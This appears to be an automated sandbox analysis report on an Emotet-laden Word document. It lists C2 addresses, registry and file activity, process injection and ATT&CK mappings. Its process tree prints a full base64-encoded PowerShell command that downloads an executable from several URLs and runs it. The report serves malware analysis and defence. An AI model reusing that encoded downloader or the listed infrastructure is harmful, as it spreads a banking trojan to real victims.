30deb0373c7608c07e9ff7333935ba9315280d321f2d4caa9b056b529230d6b6

General

Target

Docs_c41d7850c8e4bf6f19eb9cb63555968c.52
Sample

191011-5jmlhnybps
SHA256

30deb0373c7608c07e9ff7333935ba9315280d321f2d4caa9b056b529230d6b6

Score

N/A

Malware Config

Extracted

Family

emotet

C2

186.75.241.230:80

181.143.194.138:443

181.143.53.227:21

85.104.59.244:20

80.11.163.139:443

167.71.10.37:8080

104.131.44.150:8080

185.187.198.15:80

133.167.80.63:7080

198.199.114.69:8080

144.139.247.220:80

152.89.236.214:8080

78.24.219.147:8080

92.222.216.44:8080

46.105.131.87:80

190.226.44.20:21

182.176.132.213:8090

85.54.169.141:8080

192.81.213.192:8080

101.187.237.217:20

rsa_pubkey.plain

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 5 IoCs

Processes:

WINWORD.EXE

at	description	ioc	process
6225	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
6240	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
6240	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
7192	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_c41d7850c8e4bf6f19eb9cb63555968c.52.doc	WINWORD.EXE
7707	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_c41d7850c8e4bf6f19eb9cb63555968c.52.doc	WINWORD.EXE

Drops file in system dir 6 IoCs

Processes:

WINWORD.EXEpowershell.exe856.exeloadarouter.exe

at	description	ioc	process
7785	File deleted	C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD	WINWORD.EXE
7785	File created	C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD	WINWORD.EXE
15397	File opened for modification	C:\Windows\system32\GDIPFONTCACHEV1.DAT	WINWORD.EXE
17613	File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
41840	File renamed	C:\Users\Admin\856.exe => C:\Windows\SysWOW64\loadarouter.exe	856.exe
58033	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	loadarouter.exe

Modifies registry class 1 TTPs 280 IoCs

persistence

Modify Registry

T1112

Processes:

WINWORD.EXE

at	description	ioc	process
10749	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}	WINWORD.EXE
10749	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0	WINWORD.EXE
10749	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
10780	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\FLAGS	WINWORD.EXE
10795	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\FLAGS\ = "6"	WINWORD.EXE
10795	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\0	WINWORD.EXE
10811	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\0\win32	WINWORD.EXE
10811	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
10827	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\HELPDIR	WINWORD.EXE
10827	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\FLAGS	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\FLAGS\ = "6"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\0	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\0\win32	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\HELPDIR	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{6D0B0715-02E5-401D-9D76-63553C318417}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
10827	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
10827	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
10842	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
10842	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE

Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at description process

21419 Token: SeDebugPrivilege powershell.exe
Suspicious behavior: EnumeratesProcesses

at	description	process
21419	Token: SeDebugPrivilege	powershell.exe

Uses Task Scheduler COM API 1 TTPs 12 IoCs

persistence

Query Registry

T1012

Processes:

OSPPSVC.EXE

at	description	ioc	process
25288	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	OSPPSVC.EXE
25288	Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	OSPPSVC.EXE
25288	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs	OSPPSVC.EXE
25288	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid	OSPPSVC.EXE
25288	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgID\	OSPPSVC.EXE
25288	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\	OSPPSVC.EXE
25288	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	OSPPSVC.EXE
25288	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\InprocServer32	OSPPSVC.EXE
25288	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\	OSPPSVC.EXE
25288	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\ThreadingModel	OSPPSVC.EXE
25288	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32	OSPPSVC.EXE
25288	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler	OSPPSVC.EXE

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

powershell.exe856.exeloadarouter.exe

at	description	process	target process
34960	PID 2024 wrote to memory of 1372	powershell.exe	856.exe
35537	PID 1372 wrote to memory of 1740	856.exe	856.exe
42308	PID 284 wrote to memory of 1892	loadarouter.exe	loadarouter.exe

Emotet Sync 1 IoCs
trojan banker

Processes:

856.exe

description ioc process

Event created Global\E64C019BB 856.exe
Suspicious behavior: EmotetMutantsSpam
emotet family
family

description	ioc	process
Event created	Global\E64C019BB	856.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_c41d7850c8e4bf6f19eb9cb63555968c.52.doc"
1⤵
- Drops Office document
- Drops file in system dir
- Modifies registry class
PID:320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiAGIAMQA0ADcAeAAwADgAMABjADIAPQAnAHgAMgA3ADMAMAA1ADAAMwBjAGIAMAA2ACcAOwAkAGIANQB4ADAAYwA0AGMANgBiADMANAA4ADgAIAA9ACAAJwA4ADUANgAnADsAJABjAGIAMAA1AGMANgA1ADEAMABjADAAMAA3AD0AJwBjADAAMQA4ADMAMAA5AHgAMABjADIAJwA7ACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgA1AHgAMABjADQAYwA2AGIAMwA0ADgAOAArACcALgBlAHgAZQAnADsAJAB4ADMAMAA5ADQAeAAwADkAYwAwAGIAMAA9ACcAYwBjADAAOAAyADYAMAAyAHgAMwAxACcAOwAkAHgAYwAyAGMAMgA5ADUAeAAyADAAOAAwADIAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBMAGkARQBOAFQAOwAkAGIAMAAwAGIAMQAzADcAMQAwADgAMQA9ACcAaAB0AHQAcAA6AC8ALwB4AHMAbgBvAG4AbABpAG4AZQAuAHUAcwAvAGIAbABvAGcAcwAvADQAeAA0ADYANgB2AC8AKgBoAHQAdABwADoALwAvAG8AYgBiAHkAZABlAGUAbQB1AHMAaQBjAC4AYwBvAG0ALwBhAHEAbwBlAGkAdgBqADQAZgBkAC8AdQBzADUAaAB0AHYAbgAvACoAaAB0AHQAcAA6AC8ALwB2AGUAZQBwAGwAYQBuAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZABXADAAbwAzAFIAbwBKAE4ARwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGsAbQBhAGMAbwBiAGQALgBjAG8AbQAvAHUAOQByAC8AKgBoAHQAdABwADoALwAvAGEAaQBqAGQAagB5AC4AYwBvAG0ALwBkAHUAcAAtAGkAbgBzAHQAYQBsAGwAZQByAC8AdAAwAC8AJwAuACIAcwBwAEwAYABpAFQAIgAoACcAKgAnACkAOwAkAGMAeABjADIAMAAwADAAMQA1ADMAYgA9ACcAYwA3ADgAeABiADgANwA5ADAAMAAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAYwAxADYAOAAwADEANAAzADAAYwB4ACAAaQBuACAAJABiADAAMABiADEAMwA3ADEAMAA4ADEAKQB7AHQAcgB5AHsAJAB4AGMAMgBjADIAOQA1AHgAMgAwADgAMAAyAC4AIgBEAG8AdwBOAEwAYABPAEEAZABmAGkAYABMAGUAIgAoACQAYgBjADEANgA4ADAAMQA0ADMAMABjAHgALAAgACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwApADsAJABiADkAMwA2ADYAYgAwADAAOAB4ADYAPQAnAGMAMAAzADAAMABjADkAOAAyADcAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAHgAYwAwAHgANQA3AGIAMwA4AGIAMgB4ADcAKQAuACIAbABgAGUAbgBnAFQAaAAiACAALQBnAGUAIAAyADQANQAxADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQByAFQAIgAoACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwApADsAJABiAHgAYwAxADAAMAA1ADIANQBjADAANwA0AD0AJwBjADcANgAwADQAMAAwADcAeAB4ADMAMgA4ACcAOwBiAHIAZQBhAGsAOwAkAGIAMgAwADMANwAwADYAMAA5ADQAOQA9ACcAeAB4ADIAMABiADkAMwAwADQAMwBjADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAeABjADUANgAwADAAMwA5ADUAOAB4AHgAPQAnAGMAMAA1ADkAMgAzADQAMAAwADYAYwAwACcA
1⤵
- Drops file in system dir
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1639153055-1289446165-20794243241546091579-67595048-196290416-12947744231590096680"
1⤵
PID:2020

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
1⤵
- Uses Task Scheduler COM API
PID:1992

C:\Users\Admin\856.exe
"C:\Users\Admin\856.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1372

C:\Users\Admin\856.exe
--d025e3d7
1⤵
- Drops file in system dir
- Emotet Sync
PID:1740

C:\Windows\SysWOW64\loadarouter.exe
"C:\Windows\SysWOW64\loadarouter.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:284

C:\Windows\SysWOW64\loadarouter.exe
--f7a216da
1⤵
- Drops file in system dir
PID:1892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/320-0-0x00000000065A0000-0x00000000067A0000-memory.dmp

Filesize
2.0MB

Download
memory/320-1-0x00000000065A0000-0x00000000067A0000-memory.dmp

Filesize
2.0MB

Download
memory/320-2-0x00000000065A0000-0x00000000067A0000-memory.dmp

Filesize
2.0MB

Download
memory/1740-5-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/1892-7-0x00000000003B0000-0x00000000003C4000-memory.dmp

Filesize
80KB

Download
memory/1892-8-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads